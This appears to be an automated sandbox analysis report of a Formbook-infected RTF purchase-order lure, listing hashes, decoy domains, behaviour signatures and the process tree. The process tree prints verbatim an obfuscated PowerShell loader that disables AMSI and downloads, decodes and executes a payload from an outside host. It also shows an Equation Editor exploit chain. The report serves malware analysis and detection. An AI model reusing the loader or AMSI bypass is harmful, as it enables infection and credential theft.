Analysis

  • max time kernel
    152s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    31-01-2022 07:26

General

  • Target

    PO-4015 DNX.rtf

  • Size

    2.2MB

  • MD5

    3f3c326776d1cca4140aec54899dd232

  • SHA1

    22f2608fde8860771b405b82bea6ec7b90aa2e13

  • SHA256

    a4f65315564c8a012c86e0f02d90d07246dbcf41347c37b93cad43b39d24f61e

  • SHA512

    703e07ea7cc623deb50fc76b5edda62e11e26c5ac37024accb5c35031c514ca13183998d2810097018118bf4ff8da98911ff4e3ba604a671c216a0b511da39b8

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

n2t4

Decoy

afvqag.icu

sharekhaneducation.co

celaty.xyz

charmingdat.com

trinitylegal.site

nuookh.site

stetnercreek.com

likeaduckinwater.xyz

yanhuan.icu

minxandmolly.com

tofindingwellness.com

sydneycemeteries.net

amethystwares.com

onglaprimaveradeljardin.online

majoroakdigital.com

xlr8s.net

jbrcvy.icu

decorator.company

compubonsai.com

seripo.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1384
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO-4015 DNX.rtf"
      2⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:948
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1628
      • C:\Windows\SysWOW64\autoconv.exe
        "C:\Windows\SysWOW64\autoconv.exe"
        2⤵
          PID:1208
        • C:\Windows\SysWOW64\cmmon32.exe
          "C:\Windows\SysWOW64\cmmon32.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1976
          • C:\Windows\SysWOW64\cmd.exe
            /c del "C:\WINDOWS\syswow64\calc.exe"
            3⤵
              PID:1620
        • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          1⤵
          • Launches Equation Editor
          • Suspicious use of WriteProcessMemory
          PID:652
          • C:\Windows\SysWOW64\CmD.exe
            CmD.exe /C cscript %tmp%\Client.vbs A C
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1016
            • C:\Windows\SysWOW64\cscript.exe
              cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
              3⤵
                PID:1220
          • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
            Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$38487558589393948578389292983848555=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,55,49,56,51,56,51,98,98,49,50,99,55,100,50,54,55,50,101,98,54,55,97,54,102,98,55,49,98,48,51,57,53,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($38487558589393948578389292983848555)|I`E`X
            1⤵
            • Process spawned unexpected child process
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1836
            • C:\WINDOWS\syswow64\calc.exe
              "{Path}"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              PID:1264

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Execution

          Exploitation for Client Execution

          1
          T1203

          Defense Evasion

          Modify Registry

          1
          T1112

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Client.vbs
            MD5

            a85bb27f28f7557c43e5815816853b58

            SHA1

            c08058804d9a73d4b07b60c07112c4440dbddf65

            SHA256

            ecb737a59c4b4adcbb6f8b00b91ffa30cb0aec107dbf32a7b38e485213518611

            SHA512

            4df9d06c6806d4bf82dfd6003f2b20ca6fc6221e4ab1366a78679ab60efa3560c873c5827393e8e186ee5a59ae7af0e57b23e7cbd5c8c5ab25a336829bd8cde2

          • memory/948-54-0x0000000072311000-0x0000000072314000-memory.dmp
            Filesize

            12KB

          • memory/948-55-0x000000006FD91000-0x000000006FD93000-memory.dmp
            Filesize

            8KB

          • memory/948-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/948-57-0x0000000075601000-0x0000000075603000-memory.dmp
            Filesize

            8KB

          • memory/948-85-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/1264-78-0x0000000000250000-0x0000000000264000-memory.dmp
            Filesize

            80KB

          • memory/1264-73-0x0000000000400000-0x000000000042F000-memory.dmp
            Filesize

            188KB

          • memory/1264-77-0x0000000000980000-0x0000000000C83000-memory.dmp
            Filesize

            3.0MB

          • memory/1264-75-0x0000000000400000-0x000000000042F000-memory.dmp
            Filesize

            188KB

          • memory/1264-74-0x0000000000400000-0x000000000042F000-memory.dmp
            Filesize

            188KB

          • memory/1384-84-0x0000000007B40000-0x0000000007C2C000-memory.dmp
            Filesize

            944KB

          • memory/1384-79-0x0000000006FF0000-0x0000000007161000-memory.dmp
            Filesize

            1.4MB

          • memory/1836-64-0x0000000002842000-0x0000000002844000-memory.dmp
            Filesize

            8KB

          • memory/1836-62-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp
            Filesize

            11.4MB

          • memory/1836-70-0x000000000286E000-0x000000000286F000-memory.dmp
            Filesize

            4KB

          • memory/1836-71-0x000000000286F000-0x0000000002870000-memory.dmp
            Filesize

            4KB

          • memory/1836-68-0x0000000002872000-0x0000000002874000-memory.dmp
            Filesize

            8KB

          • memory/1836-69-0x0000000002871000-0x0000000002872000-memory.dmp
            Filesize

            4KB

          • memory/1836-66-0x000000000284B000-0x000000000286A000-memory.dmp
            Filesize

            124KB

          • memory/1836-72-0x0000000002874000-0x0000000002875000-memory.dmp
            Filesize

            4KB

          • memory/1836-65-0x0000000002844000-0x0000000002847000-memory.dmp
            Filesize

            12KB

          • memory/1836-61-0x000007FEFB771000-0x000007FEFB773000-memory.dmp
            Filesize

            8KB

          • memory/1836-63-0x0000000002840000-0x0000000002842000-memory.dmp
            Filesize

            8KB

          • memory/1976-82-0x0000000001FC0000-0x00000000022C3000-memory.dmp
            Filesize

            3.0MB

          • memory/1976-83-0x0000000000910000-0x00000000009A3000-memory.dmp
            Filesize

            588KB

          • memory/1976-81-0x0000000000080000-0x00000000000AF000-memory.dmp
            Filesize

            188KB

          • memory/1976-80-0x0000000000A20000-0x0000000000A2D000-memory.dmp
            Filesize

            52KB